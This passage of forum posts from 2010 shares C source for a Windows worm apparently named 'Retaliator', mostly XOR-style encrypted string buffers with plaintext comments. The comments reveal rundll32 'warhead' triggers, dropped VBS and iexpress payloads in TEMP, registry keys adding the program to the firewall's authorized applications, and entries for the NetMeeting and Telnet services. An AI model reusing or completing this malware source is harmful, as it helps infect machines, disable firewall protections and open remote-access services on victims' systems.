    					  "\xEC\xDC\x83\xDA\xC0\xA2\xF8\x83\xF8\x8B\xFD\xFB\xCD\xEF\x9B\xCA\x9A"\
    					  "\xCE\x86\xF4\x84\xD8\xC3\xE9\xC0\x8D\xB6\xF1\x9D\x8C\xE9\xD6\xDF\xC0"\
    					  "\xD6\x8C\xB1\xD5\x8D\xAF\xA5\xCE\xCC\x8E\xA5\x83\xE7\xB5\xD2\xFF\xA8"\
    					  "\xD6\x8C\x86\xFE\xC1\xB6\xF8\x9C\xF9\xEF\x87\xF2\xF1\xD8\xBC\xBD\xFE"\
    					  "\xF9\xE8\xEC\xED\x9A\xF9\x8F\xCA\xFB\x89\xEA\x85\x83\xFF\x8C\xF4\x80"\
    					  "\xC2\x81\x94\xE3\xCD\x82\x8E\xC2\x90\xA2\xCF\x8C\x90\xAC\xFD\xF7\xD5"\
    					  "\xED\xB1\xA1\xB6\x86\x97\x94\xF4\x9F\xB2\xD5\xD9\x9F\xD8\xC2\xE8\x9F"\
    					  "\xC3\xAA\xE8\x81\xFC\xFC\xA6\xF4\xD4\x8D\xCA\x95\x86\xE9\x82\xA7\xD0"\
    					  "\x8C\xF9\xDD\xAC\xBD\x92\xD4\xE0\xE8\x8F\x90\xDE\xC7\xC9\xC2\xDF\xD3"\
    					  "\xE8\xFA\xBF\x8D\xB8\xF5\xDF\xA8\xF8\x82\xBA\xD5\xED\xA7\xC4\xF9\x94"\
    					  "\x93\x82\x83\x9D\xC5\xD3\xC0\xAF\xB6\xD5\xB2\xE5\x82\x87\xFB\xC5\x93"\
    					  "\x8D\xBD\x8C\xD8\xE3\xD6\xAD\xAA\xDE\xCD\xC7\x8B\xC8\x93\x9D\xC1\xE0"\
    					  "\xD9\x8F\xA9\xC1\xC8\xF8\xC4\xEA\x84\xF8\xBB\xEA\xC6\xA7\xCA\xE4\x8A"\
    					  "\xF8\xC3\xF9\xCD\xF2\xB5\xDC\xCF\xC7\xC0\xA7\xFF\xEC\xFA\x8A\xB4\xCC"\
    					  "\xCE\xC4\xE2\xE4\xA3\xA0\xF2\xC7\xC1\xB9\x98\x92\xA0\xD7\x8F\x99\xD2";
    	plainbuffer[61] = "\xDD\xD9\xEC\xEE\xB3\x98\xF0\xCA\xCC\x87\xB8\xBC\x9E\xD7\xE1\x98\xF1"\
    					  "\xE3\xB0\xB1\x88\xD8\xC6\xEF\x84\x99\xE8\x98\x87\xAE\xD7\xF6\x8F\x9F"\
    					  "\xF7\x81\xE6\x85\x85\xCA\xF1\xBA\xF7\xCF\xA7\xED\xF9\xA6\xE6\xE3\xA6"\
    					  "\xEB\xBB\xF0\x83\xF0\xF8\x91\x83\xA8\x8C\xA0\xE6\x86\xB9\xD5\xC0\xD3"\
    					  "\xB0\xD4\xAA\xBB\xD4\x8B\x94";//"\@echo off\n\%SystemRoot\%\\system32\\rundll32.exe retaliator.bat, triggerWarheaD"; // *natdat = "\@echo off\n\%SystemRoot\%\\system32\\rundll32.exe NatSec.dll, triggerWarheaD";
    	plainbuffer[62] = "\xC2\xA2\xF3\xA2\xAD\xFA\xBE\x84\xC4\x81\xC9";//"USERPROFILE"; // empty = getenv("USERPROFILE");
    	plainbuffer[63] = "\xDD\xA9\xE8\xB9\xB0\xE1\xBA\xD8\xF0\xC8\x85\x9F";//"explorer.exe";
    	plainbuffer[64] = "\x9F\x91\xA3\xE0\xCE\xC5\xF4\x92\x9D\xFB\xEC\x9F";//"rundll32.exe";
    	plainbuffer[65] = "\xAA\xC0\xE0\x88\xE6\xAA\xF1\x95\x9B\xE2\xFC\xEA\x94\xC1\x9D";//"ALLUSERSPROFILE";
    	plainbuffer[66] = "\x99\xC6\x84\xF1\x8A\xCB\xC3\xF5\xC0\x8C\xA2\xF8";//"winlogon.exe";
    	plainbuffer[67] = "\xE9\xD4\xA7\xE0\x80\xAB\xFA\x87";//"explorer";
    	plainbuffer[68] = "\x9B\xE3\xC2\xB9\xC6\x99\xFD\x91";//"rundll32";
    Last edited by fb1h2s; 10-13-2010 at 11:00 PM.

  6. #6
    Code:
    plainbuffer[69] = "\xBC\xB9\xEE\xEF\xF7\xD3\xC7\xF7\xA4\xBD\xE3\xD1\xCE\xFC\xCF"\
    					  "\xAB\x93\xA9\xA6\x9B\xD0\xA9\xA8\x93\x8B\xC7\xD6\xCF\xDB\xA5"\
    					  "\x9E\xD4\xCF\xCA\x98\xE5\xDF\xDC\x8A\xF2\x86\xEA\x82\x93\xDD"\
    					  "\x86\x9B\xB7\xBD\xDB\xE2\xE3\xF7\xD0\xC5\xC6\xE8\xBD\x8E\xF9"\
    					  "\x8B\x89\xE7\x8C\xAA\x99\xFE\x97\xDF\xE0\xC7\xF1\x9F\xDF\x8A"\
    					  "\xC6\x8E\xC8\xDD\x9D\xDB\xA3\xF5\xDB\xBF\xDC\x85\xAB\x84\x86"\
    					  "\x82\xFF\xB5\x99\xF4\x88\x85\xF4\x86\xE8\x9F\x8A\xDE\xF8\xB9"\
    					  "\xC7\x9A\xC5\xCC\xBB\xB6\xEA\xD0";
    	plainbuffer[70] = "\xB7\xFB\xF4\xFC\xA3\xFB\xA0\x99\xF6\xE2\xEB\xDF";//"\\winntsp.vbs"; // *sfpointr
    	plainbuffer[71] = "\x83\xA9\x8F\x9E\xE8\xF5\x8D\x9E\xB2\x98\x92\xF8";//"\\wscript.exe";
    	plainbuffer[72] = "\xEB\x8E\x8C\xF6\xC5\xA4\xE0\xCF\xFC";//"wscript \"";
    	plainbuffer[73] = "\xF2";//"\"";
    	plainbuffer[74] = "\xFB\xDB\xDA";//" ji";
    	plainbuffer[75] = "\x8D\x89\x8F\xF5\x84\xFE\xF8\xB3\xBD\x84\xAE\xA9\xD9\x8D\xDD"\
    					  "\x85\xEF\xC4\xED\xD1\x8E\xB6\x87\xA6\xDE\x8A\xE5\xB9\xFE\xC3";
    					  //" tuhaadi seva bich haazir hai.";
    	plainbuffer[76] = "\xB9\xE4\xDF\xF8\xA5\x99\xE9\xBF\xDE\x84\xAF\x80\xAC\xE1\xBC\xDB\x8E\xC4\xA3\xB9";
    					  //"Windows Task Manager";
    	plainbuffer[77] = "\xE4\xFF\xC7\xD9\x8C\xD6\x8F";//"Jaijeya";
    	plainbuffer[78] = "\xA2\xC0\xCA\x93\x89\xDF\xE9\xA8\x9D\xC7\xBD\xE4\xCD\xB6\xE7"\
    					  "\xCF\x91\xFE\x9C\xF3\xE9\x91\x96\xB9\xE1";
    					  //"Hor Theek-Thaak Hainn Na?";
    	plainbuffer[79] = "\x9A\xD6\xBC\x9D\xAC\xE0\xA4\xFE\xE2\xA4\xEE\x83\xF9\xDD\xB0"\
    					  "\xBA\x88\xB2\xDE\xCC\x91";
    					  //"Tusaan bas huqm deya.";
    	plainbuffer[80] = "\xAC\xC4\xB3";//"Run";
    	plainbuffer[81] = "\x9C\xDE\xDF\xC0\xD5\x9F\xED\xE1\xDE\xCC\x88\xCF\xB1\xAC\xC3\xE2"\
    					  "\xA9\xB5\xD8\xBD\xE6\xD9\xE1\x9A\x81\xFD\xAC\xE0\xB0\xFA\xF7\xC9"\
    					  "\x95\xAD\x9A\xE7\xEB\x81\x9D\xAB\x9D\x86\xAE\xF2\xB1\xB9\xD0\xFE"\
    					  "\xAB\xD9\xB6\xD2\xE4\x9F\xF1\xCD\x99\xFF\xE9\xE4\xE1\x8A\x9B\xDE"\
    					  "\x94\xBD\x87\xE0\xE5\xEE\xA6\xEA\x85\xEF\xA1\xAE\x89\x95\xCD\xDA"\
    					  "\xA9\xD5\xB5\xDA\xAC\xFA\x8A\x81\xFB\x8D\xDB\x8A\xE1\xF8\xB2\xF0"\
    					  "\xAF\xF1\x87\xB9\xE0\xFA\xC9\xBE\xB8\xD5\x91\xDE\xF4\xCA\xC4\xF1"\
    					  "\xD0\xC1\xE7\xB1\xDD\xBF\x91\x8A\xAF\xF3\x8E\x93\xD7\xF0\x9E\xBE"\
    					  "\xBB\xAC\xAA\x8E\xB9\xFF\xEF\x9E\x98\xBC\xC0\xCA\xBF\xA7\xDF\x94"\
    					  "\x86\xED\xC8\xE3\x87\x96\x99\xBC\xBC\xE0\xDF\xE9\xEB\xBC\xB4\xE8"\
    					  "\xFD\xEF\xE2\xAA\xF3\x81\xFE\xBA\xDD\x9C\xF1\xDC\xA4\xFB\x9D\xAA"\
    					  "\x92\xCA\xC7\xC7\xC1\xB0\xB6\x91\x89\xBF\xBC\xEC\x88\xD3\xE8\xB5"\
    					  "\x80\x96\xD2\xA7\xAA\xE4\xA4\x8B\xEE\x95\xA7\xF8\xA8\xFB\xF5\xC7"\
    					  "\xB8\x82\xB4\xF1\xF4\xC0\x84\xC3\x81\x83\xAE\xE0\x87\x9E\xE9\xD8"\
    					  "\xDF\xA9\xC2\xDD\xCA\xBE\xC5\xC4\xC4\xD9\xE1\xF4\x8C\x98\xEE\xCD"\
    					  "\xC9\xCB\xF9\xDA\xE1\xC5\xF5\x86\xCC\xCC\xF9\xBA\x82\xAC\xF0\xAD"\
    					  "\xC3\xAE\xD9\xD3\xB4\xF8\x91\xE8\xF3\xA8\xF6\xD5\xE2\xD5\xCB\xD9"\
    					  "\xCD\xAF\xE3\xC1\xBD\xCC\x9B\xB2\x8F\xEF\x91\x8A\xE2\xBA\xFD\xA3"\
    					  "\x81\xB9\xF3\xCD\xDB\xAC\x8E\xF0\xF1\xF9\x8A\x89\xD8\xDA\xDE\xE4"\
    					  "\xEC\xB4\x91\xB1\xDF\xE4\xA8\xDA\xAA\xF6\x9D\xE8\xC3\xBC\xB9\x9A"\
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  7. #7
    Code:
    "\xE8\xCA\xF9\x80\xAE\xA5\xED\xC1\xB8\x99\xCF\xD0\xB2\xB9\xF3\xDC"\
    					  "\xC1\xAD\xF8\xAC\xD6\xCF\xC5\xBF\xBF\xC7\xAC\xC3\xAC\xD2\x8C\x97"\
    					  "\xDE\x9F\x85\xE7\x9F\xA8\xED\xB0\xCC\xF4\xCB\xD0\x9D\x87\xCC\xF8"\
    					  "\x83\xF3\xAB\xF8\x96\xB4\xC1\xCB\xFA\xBB\x91\xDF\xE9\xD6\xF5\xC8"\
    					  "\xDC\x99\xB6\xF6\x89\xAF\xE4\xA1\xDE\x8F\xDB\x98\xDC\xBF\xDD\xD9"\
    					  "\xBE\x93\x98\xC9\xB1\x8C\xB8\xEE\x85\x8A\xE6\x86\xB3\xC4\xC3\xBD"\
    					  "\xB9\xAA\xFB\xB2\xAB\xF9\x9D\xF9\x8F\xC8\xB1\xC5\xFC\x89\x98\xC8"\
    					  "\x96\xFD\x9B\xF8\x99\xC3\x8C\xBF\xA6\xB2\xC8\x9F\x9B\xD0\xAA\x8E"\
    					  "\xE3\xC8\xF1\xF0\xEF\x99\xAF\x86\xE9\x8C\xE0\xBA\x9F\xA3\xD5\xEB"\
    					  "\xCA\xC0\xC6\xC3\xDE\xC1\xBF\x87\x80\xBE\xF0\x9A\xEB\xD4\xDF\x8A"\
    					  "\xB0\x8E\xFF\xDB\xDF\xF0\x9F\xE2\xDA\x85\xBA\xDE\x8C\xFD\xBE\xA8"\
    					  "\x9B\xE9\xD6\xDF\xCC\xFF\xB6\xE8\xEC\xF0\x84\xB8\xE9\xDE\xF2\xCE"\
    					  "\x8A\xFD\xB7\xD0\x87\xFF\xCB\xB7\xAD\xD5\x91\xC0\xD5\xCD\xFC\xC4"\
    					  "\xFE\xE0\xAA\xE6\x9C\x8C\x86\xC3\x9F\x80\xCD\x84\xC5\xE3\xC4\xB0"\
    					  "\xAC\xC9\xAB\x93\xDE\x8D\xF2\xAD\xFB\xD2\xE9\xE9\x85\xE1\xEC\xC8"\
    					  "\xFE\xDB\xA9\xC2\x9C\x8B\xEA\x8A\xB5\xDE\xAD\xCC\xFF\x9E\xEB\xBD"\
    					  "\x97\xFE\x9A\xF2\xE1\x86\x87\xCA\x9C\xB6\x9C\xEC\xE3\xFB\xB7\xE8"\
    					  "\x98\x9F\xD5\xDC\xEA\x82\xAD\xAB\xCE\xB6\xE8\xED\xD2\xE7\xBD\x98"\
    					  "\xCB\x8C\xF0\x99\xA2\xCD\xE7\xB9\xAF\xF1\x9C\xAB\xF1\xFB\xEA\xB1"\
    					  "\xFB\xB8\x91\x88\xAA\xAC\xDE\xFF\xD6\xDF\xE7\xAF\xCB\xE8\xC3\xD8"\
    					  "\xE9\xDB\xE5\x88\xC6\xFF\xA8\xEF\xD4\xAD\xF0\xAF\x98\xEE\xD5\x93"\
    					  "\x8C\xF3\xF7\x99\xF8\x91\x8A\x92\x88\xF3\xA2\xF8\x86\xC3\x88\xFF"\
    					  "\xE2\xAF\xED\xE2\xEB\xD3\xB0\xED\xEA\xAC\xFE\xE7\xBD\xA6\xB7\xF2"\
    					  "\xB3\xBB\xBE\x83\xFB\xB6\xCF\xF8\x92\xD6\xD5\x95\xF6\xB7\xBE\xC1"\
    					  "\x9F\xA4\xB4\xEE\xDD\x81\xAD\xE5\x81\xF5\xBC\xB9\xB7\xF8\x9D\x99"\
    					  "\xE9\x94\xB1\xE3\xB5\xED\xA6\xD6\xFF\xD2\xBE\xF7\xE7\xD3\x9F\xFA"\
    					  "\x92\xCA\x9B\x85\xFF\xA2\xF9\xDC\xD1\x87\xC4\xD3\xAC\xB4\xD3\xD9"\
    					  "\xFE\xD8\xEF\xA6\x9F\xF9\xE9\xCC\xFC\xCB\xF9\xD7\x87\xAD\x95\xB0"\
    					  "\xDA\xDA\xF1\xDB\xBD\xBA\xF0\xB4\xFF\xAD\xC8\x8F\xD2\xEE\x91\xED"\
    					  "\xC9\xA9\xF8\x85\xE7\xFF\xCB\xD9\xCD\xAF\xE3\xC1\xBD\x90\xE5\xDE"\
    					  "\xAE\xAA\xD8\x8A\xE2\xBA\xFD\xBE\x9D\xBE\xF0\xC7\xC4\xE7\x9D\x93"\
    					  "\xD9\xF1\x8E\xB3\xCE\xD5\xC9\xC9\xF9\xF1\xD6\xEC\xF5\xE2\x83\xED"\
    					  "\xFB\x8C\xC1\xAF\x91\xBA\xEA\x9D\xEE\xED\xC9\x8A\xB1\x9B\xAC\x8A"\
    					  "\xFD\x97\xCD\x8A\xCC\xC2\xDF\xD1\xC6\x8E\xF4\xAB\xC7\xD8\xA2\xE2"\
    					  "\x9C\xDA\xE0\xD8\xAB\xCA\xFF\xD3\x8D\xFE\xCA\xB5\xB9\xB4\xB1\xDD"\
    					  "\xDB\xED\xCB\xC1\xCB\x86\xE4\xA6\xAC\xF2\x97\x8C\xE9\xFA\x8D\x81"\
    					  "\xFA\xF2\xD3\xC6\xC8\xD7\xD3\xD5\xC2\xC9\x8A\xEC\xCC\xB2\xAF\xC1"\
    					  "\xFE\x93\xDC\xCC\xD6\xB0\xBD\x85\xC4\xBF\x8C\xC9\xE0\xCF\xB6\xFF"\
    					  "\x8A\xF1\xF0\x97\xF7\xD2\xC2\xBD\xAA\xAD\xB0\xD4\xE8\xE1\x8B\xB5"\
    					  "\xDD\xD7\xBD\x89\xEC\x9C\x99\xF8\xCD\xEB\x9D\xC4\xAD\xDD\x8C\xE4"\
    					  "\x85\xFD\xFE\x9D\xAB\xCD\xC5\xF5\xC4\x87\xEB\xFE\xE9\x82\xBD\x8E"\
    					  "\xFE\xDF\xF3\xC9\x89\xA3\xF7\xCC\xCC\xDF\xDD\xE2\xCD\xC8\xFA\xFE"\
    					  "\x9B\xAE\xCA\xAE\xEB\xC2\xDA\xCB\x86\x8F\x86\xB1\xA4\x90\x80\xF4"\
    					  "\xD9\xBF\xA7\x9B\xC3\x9B\xA1\xBD\x8E\xDE\x93\x91\x8F\xE2\xDE\xED"\
    					  "\xDB\xE9\xB4\xB9\xFF\x82\x9B\xF8\x9B\xA1\xC5\xE4\x87\xE9\xCE\x9E"\
    					  "\xB3\xD0\xD6\xC0\x83\x96\xA6\xAC\x84\x9A\xB2\xEB\x84\xB8\xED\xDF"\
    					  "\x8E\x9D\xF2\x97\xD2\xB0\x8E\xFF\xB1\xCF\x87\xE6\x90\xC8\xC1\xAF"\
    					  "\xC4\xEC\xDB\xDC\xFA\xFE\xFF\xBB\xEC\xC8\xBE\xC2\x8A\x8C\xFB\x9A"\
    					  "\xA5\xD3\xB1\xD2\xF4\x81\xFE\xD4\x8A\xE9\xE5\xE3\xE4\x86\x8B\xC8"\
    					  "\x9E\xE3\xD1\xAA\xA4\xC0\x8A\xC7\x90\xAE\xEF\xFD\xD8\xB2\x8F\x8E"\
    					  "\xDB\x89\xDE\xCE\xAB\xA8\xE2\xD2\xF1\x9D\xFF\xBB\xED\xEE\xE1\xBA"\
    					  "\xE0\xA1\x8D\xF8\xDB\xDB\x8C\x9C\xDE\x8C\xBD\xFF\xC0\xD3\xE1\xDC"\
    					  "\xEF\xDC\xD1\x98\xE7\xDC\xED\xE4\xD9\xC2\xAC\xAF\xE5\xDB\xBA\xD9"\
    					  "\xBB\xD6\xD7\xF5\x92\xF8\xF6\xA8\x99\xF9\x8F\x99\xB3\xB5\xDF\x89"\
    					  "\xCA\xBB\x90\xF9\x8C\xC4\xBE\xB3\xBE\xE8\xD9\xA5\xB3\xBC\xBD\xE5"\
    					  "\xE5\x9F\xEB\xBC\xEC\x86\xB1\xEE\x99\xA9\xE8\xCD\xB3\xE7\xE5\xD7"\
    					  "\xBB\xAC\xCE\x85\xDF\x8D\xA0\xD4\x98\xA3\xFF\xDD\x9E\xC4\xE2\xB2"\
    					  "\xC0\xC0\x9C\xBD\xAD\xF7\x96\x86\xF8\x82\xF0\xAA\xFA\xD9\xB4\x96"\
    					  "\xEB\xC5\xDB\x8B\x9E\xF8\xD9\x92\x97\xFD\x82\xA7\xFF\xBE\xA2\xFF"\
    					  "\x9A\xB2\xE9\xD9\xE2\xB4\xBB\xBA\xA2\xA2\xDD\xA7\xD2\xCA\xC4\xCF"\
    					  "\xD8\x84\xDC\xCA\xC7\xD3\x95\xEA\xA6\xFD\xBF\xFC\xF5\x96\xF5\xD5"\
    					  "\xA3\x90\xC8\x85\x8E\x97\xA0\xF1\xF8\xFA\xCE\x82\xA9\xD5";
    	plainbuffer[82] = "\xC5\xC2\x9F\x8E\xDF\xD6\xC3\xC4\xD0\xD3\xB7\xD7\xFD\xFF\xBE\x84"\
    					  "\x88\xE6\xB6\xDD\xE3\xD9\x99\xBD\x90\xCC\xCF\xA1\x8A\x8E\xFE\xDF"\
    					  "\xB4\xDA\x81\x9E\xF5\xC1\xEB\xFC\xDC\xA9\xE4\xB7\xDD\xCE\x92\xC6"\
    					  "\x8A\xD2\xEF\xC7\xAF\xDF\xBA\xBE\xD8\xCD\xC8\xA8\xAB\xA8\xA4\xB6"\
    					  "\xC0\xED\xDA\xD2\x85\xC3\xAF\xDF\x9A\x97\xB6\xC4\xC3\xEC\xA7\x87"\
    					  "\xA9\xE9\xD0\xC0\xF1\xF4\xC4\xC8\xD6\x9B\xA2\xEF\xBB\xB4\xA3\xCF"\
    					  "\xC2\x9D\x92\x89\xB9\x95\xDE\xE8\xA8\xB3\x92\x9D\xFE\xCD\xB4\xF8"\
    					  "\xAE\xB7\xF6\x98\xFC\xF3\xD8\xB7\xB6\xE3\xAF\x90\xDC\xFF\x8B\xD0"\
    					  "\x92\x84\xFA\xA3\xE6\x91\x8F\xD3\x84\xF5\x8C\x8B\xC8\xA4\xA0\xF8"\
    					  "\xDF\xB4\xCE\x90\x8D\xCC\xA2\x8C\xBF\xEB\xF7\xEF\xE6\xB3\xF3\xDB"\
    					  "\x86\xEF\x9C\xD8\xB3\x91\xCE\xD5\xDA\xC8\xF9\xE4\xC5\xC9\xE7\xBD"\
    					  "\xE5\x9F\xDB\x8D\xC7\xE3\xC8\xD7\x82\xA8\xE3\xDC\xC8\xCA\x86\xF1"\
    					  "\xDD\x83\xBA\x99\x8C\xED\xC7\x8E\x8C\xCF\xDC\xC3\xDB\xC0\xD3\xE3"\
    					  "\xEB\xA7\x9F\xC1\xC5\xC2\xAF\xE9\x8E\xE5\x8B\xE1\x86\xE3\xD1\xA8"\
    					  "\xAB\x8C\x94\xFA\xCF\xCC\xD8\xC4\xE1\xFF\x8D\xFB\x81\x85\xFC\xD8"\
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  8. #8
    Code:
    "\xD8\xE0\xD9\x8C\xC5\xE0\xDF\xBE\xA7\xE1\x84\xD0\x86\xC3\xC0\x8C"\
    					  "\x95\xA8\xF8\xC6\xA9\xC1\xC1\xFA\xD4\xC0\x84\xFE\xBA\xA4\xD7\xBB"\
    					  "\xCF\x97\xA3\xE4\xDF\xB0\xDD\xF5\x95\xC9\xC9\xC0\xC4\xB2\xBD\xA2"\
    					  "\xFF\xAF\xB1\xCD\xC4\xDC\x80\xE0\xA5\xBC\xEF\xEF\xC8\xB8\xD8\xE0"\
    					  "\xC9\x84\xCD\xCE\xBD\xFC\x91\x93\xF3\x9A\xA8\xCE\xD8\xFC\xE0\xAA"\
    					  "\xEA\xA7\xA7\xB9\xF9\xEC\x89\xD7\xDC\xAD\x8B\xCF\xE8\xE8\xDD\xE4"\
    					  "\xF2\xEE\xEB\xB9\x85\xBA\xEA\xD8\xE4\xF8\x81\x83\xC8\xEC\xB3\xFD"\
    					  "\xDC\xBA\xFB\xF6\xBC\xEA\xEC\xB1\x8B\xE9\x93\x89\xF5\x80\xCE\xC0"\
    					  "\xCF\xD8\x95\xFA\xA5\xD7\x8D\xB1\xBC\xE7\xCF\xE3\xBA\x96\x82\xE8"\
    					  "\xFC\xBB\xC3\xA1\xEC\x85\xBF\xF0\x91\xAC\xE9\xC8\xE9\xB1\xBF\xB1"\
    					  "\xC1\xD1\xE8\x89\xC6\xAC\xB2\xDD\x86\x93\xBC\xF8\xD8\xAD\xCC\xA3"\
    					  "\xC3\xDD\xB6\x85\xAB\xFF\x91\x9E\xD4\x88\xA3\xE3\x99\xF2\xB1\xC7"\
    					  "\xBD\xE1\xB5\xEF\xFE\x9F\xE7\x85\x94\xCD\x85\x8B\xE3\xBE\xF8\xEF"\
    					  "\x92\xA2\x85\xBD\xD1\xA8\xD4\xC1\xFA\xDE\xE3\xB1\xC5\xF1\xC3\xCC"\
    					  "\xD8\xE9\xE0\xDB\x93\x82\xCA\x90\xCA\xCA\x80\xED\xBC\xBA\xE7\x96"\
    					  "\xC4\xAD\xD9\xBE\x97\xF9\xC0\x95\xCF\xB5\xE8\x85\xA8\xBA\xFE\xC4"\
    					  "\xD3\x89\xFF\x91\x9E\xD6\x9A\xA5\x9E\xAA\xEA\xC3\xE1\xBD\xE4\xE7"\
    					  "\xBF\x9E\xF0\xD0\xC0\xA9\xC7\xC0\xC3\x9E\xB3\x92\xDF\xCB\xCD\xC6"\
    					  "\xE1\x89\x86\xD4\xF1\xFC\xB9\x84\xCB\xE7\x87\xFE\xC1\xF0\xAB\x97"\
    					  "\xD6\xF6\xE9\x80\xB2\x98\xE9\x91\xD7\xF3\x86\xCD\xAF\xB8\xD8\xFE"\
    					  "\xC9\xAE\xFE\xB9\xD4\xD8\xF2\xC6\x8E\xD2\xFE\xCB\xAB\xCC\x91\x8F"\
    					  "\xC0\xDA\x85";
    	plainbuffer[83] = "\xAE\xF0\xD5\xD8\x8C\xAD\xE6\x80\xA4\x83\xCA\xC0\x8F\x92\xF2\xD2"\
    					  "\xB4\xDD\xE9\xB4\x97\xE0\xA8\xFC\xDC\x9B\xED\x9A\xB7\xFC\x9D\xF8"\
    					  "\xE3\x8C\xAA\xAD\xB0\xFA\xF6\xE5\xBF\xDC\xBC\x93\x8B\xE9\x96\xEA"\
    					  "\x9E\xC4\xF9\x89\xF4\xC5\x96\x8C\xDC\x80\xF1\xCB\xB8\xD8\xA2\xAF"\
    					  "\xD1\xA7\x99\xAC\xCA\x8E\xCC\xEC\xA4\xBA\xA2\xE2\xDF\xA9\xFB\x80"\
    					  "\xBB\xE4\xC0\xDB\x91\x96\xC3\xD0\xC2\xBF\xB3\xE5\x9D\xFE\xA2\xF1"\
    					  "\xDF\xFC\xD1\x9D\x8E\xF8\xF1\xC3\xEA\x9B\xD5\xDE\x8E\xE9\xF4\xE4"\
    					  "\xAE\xA8\xAE\xB8\xD8\xDA\xC9\xDB\xC4\xD2\xF4\xFA\xD9\xBC\xAF\xB1"\
    					  "\xA6\x9A\xD4\xA3\xCC\xD7\x8C\xD6\xC2\xDD\xAC\x8C\xD4\xD2\x9D\xC5"\
    					  "\xD3\xC0\x87\x87\xC8\x8E\xE6\x9B\x9A\xEF\xC9\xBB\x83\xF1\x80\xC5"\
    					  "\xCD\xB9\x8C\xB1\xD8\x9F\xD0\x86\xEB\xDA\x85\xCD\xFE\x8C\x92";
    	plainbuffer[84] = "\x84\x95\x81\xBA\xB7\xD6\xDF\xCC\x8D\xEB\xA9\xA3\xF9\xFD\x9F\x80"\
    					  "\xF7\xCF\xDB\xAC\xF3\xEC\xE8\xAD\xE2\xF8";
    	plainbuffer[85] = "\xDA\x88\xFD\xD2\xFC\xF6\xE7\xFC\x86\x8D\xC1\xEC\x9C\xB2\xE2\x9A\x9A";//"\\TEMP\\jaijeya.SED"; // *sedpointr
    	plainbuffer[86] = "\xC0\x86\xC2\xC2\x9F\xD6\xA5\xFE\x98\xB4\xF9\x84\x8E\xAA\xE9\x8C\xD1";//"\\TEMP\\jaijeya.EXE"; // *exepointr
    	plainbuffer[87] = "\xCE\xBF\x83\xC3\x9F\xD2\x91\xA8\xD1\xF6\x94";//"SYSTEMDRIVE";
    	plainbuffer[88] = "\xD1\xC8\xC7\xDC\xD8\xE8\xCC\xDD\x87\xB0\xB2\x8F\x97\x9C\xB8\xFA\x91\xB3";//"iexpress /Q /M /N ";
    	plainbuffer[89] = "\x9C\xF5\xF9\xD9\x9D\xDA\xBF\xAB\x82\xD0";//"SYSTEMROOT";
    	plainbuffer[90] = "\xC0\xB9\x97\xE9\xEB\xEF\x88\xEF\xD9\xD0\xC5\xB8\xCD\x9F\xD1\xA3\xB8\xC3\x9D\xC9\xA5\xE8";//"\\system32\\iexpress.exe";
    	plainbuffer[91] = "\xD9\x82\xCC\xC4\xF8\x9D\xC9";//"vlc.exe";
    	plainbuffer[92] = "\xC0\xE1\xBD\x9A\x8B\x90\xE9\xDE\xF9\xE9\x97\xBC";//"wmplayer.exe";
    	plainbuffer[93] = "\x8F\xC7\x87\xF7\xC1\xAD\x84\x90\xB6\xC6";//"winamp.exe";
    	plainbuffer[94] = "\x85\xB9\xEE\xAE\xED\xD5\xC4\xCB\xDA\x8E\xF4\xDD";//"jetaudio.exe";
    	plainbuffer[95] = "\xAE\xF8\x8E\xE5\x97\xDD\x95\xF5\xD9\xAA\xF1\xD4\xC9\xD6";//"realplayer.exe";
    	plainbuffer[96] = "\xE0\xB0\xFB\xD9\xF9\xE2\x86\xF2\xC2\xF5\xD9\xFE\x82\xF1"\
    					   "\x8C\xAF\xD0\xEE\xDA\xAC\xB9\xDE\xD4\xAB\xD8\xF4\xBB\xC9"\
    					   "\xC9\xEF\xC9\xB4\xB6\xF2\xBB\x87\xAB\xC6\xDF\xD9\x8D\xDF"\
    					   "\x9C\x9C\xF4\xEF\xDD\xB8\x8E";
    	plainbuffer[97] = "\x8C\xBB\xF9\xD2\xC9\xFC\xC1\xFF\xFA\xF4\xAE\xDD\xF1\xD8"\
    					  "\xE9\xE2\xF3\x9B\x95\xCB\xF9\xAE\xF9\xC5\x83\x8D\x99\x8F"\
    					  "\xEC\xF5\x9E\x8F\xEF\xA1\xB9\xF5\x84\xD8\x98\x8E\xD8\x86"\
    					  "\xE9\x8C\xC5\x8B\x83\x8F\xEE\xD8\xE6\xF2\xF9\xA6\xE2\xFD"\
    					  "\xBC\xD6\x89\xF6\x83\xBB\xEB\x9C\x83\xE8\xFC\xBB\xF8\x86"\
    					  "\xBD\xCB\xF9\xF2\x93\xD4\xB6\xB7\xD0\x98\xB4\x81\xEE\x92"\
    					  "\xC1\xE4\xAB\xCB\xE8\x99\xA1\xAA\xFE\x9B\x98\xF4\x9C\xB5"\
    					  "\xF3\x9B\xEF\xA5\x96\xF1\xC3\xB0\xF6\xFE\x9E\xD8\x83\xA1"\
    					  "\xE4\x98\xB1\xF9";
    Last edited by fb1h2s; 10-13-2010 at 11:01 PM.

  9. #9
    Code:
    /*"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";*/
    	plainbuffer[98] = "\xB0\xF6\xEB\x85\xDD\x98\x83\xD0\xB0\xC4\xAA\xDF\x92\x96"\
    					  "\xCE\x80\xEB\xAC\xEA\xAC\xAB\x98\xBA\xCA\xDB\xD6\x8F\xE9"\
    					  "\xDF\x91\xD4\x81\xBA\x8E\xBD\xDA\xC9";//"SYSTEM\\ControlSet001\\Services\\mnmsrvc";
    	plainbuffer[99] = "\x9E\xE0\x92\xF7\xAB\xC0\xED\xDF\xA5\x80\xEE\xED\xE5\x89"\
    					  "\x8F\x8E\xF8\x9C\xED\x84\xB3\xF0\xA3\xB9\xC6\xDA\xCF\xB8"\
    					  "\xFE\x84\xE7\xD1\xA1\xB8\x89\xC5\xFE";//"SYSTEM\\ControlSet001\\Services\\TlntSvr";
    	plainbuffer[100] = "\xC7\x83\x87\xB7\xEE\xC3\xDA\xFE\x8A\xD3\xDF\xD4";//"\\mnmsrvc.exe";
    	plainbuffer[101] = "\xA9\xE9\xEB\xDF\xAC\xAB\xAC\xE8\xB4\xEC\xF4\x8B";//"\\tlntsrv.exe";
    	plainbuffer[102] = "\xB4\xAE\xA6\xC6\xB9\xAF\x89\xE0\xC9\xB9\xA0\xBE"\
    					   "\xB2\xD3\xCC\xD3\xC5\xCB\xF9\xD0\xDE";//":*:Enabled:Retaliator";
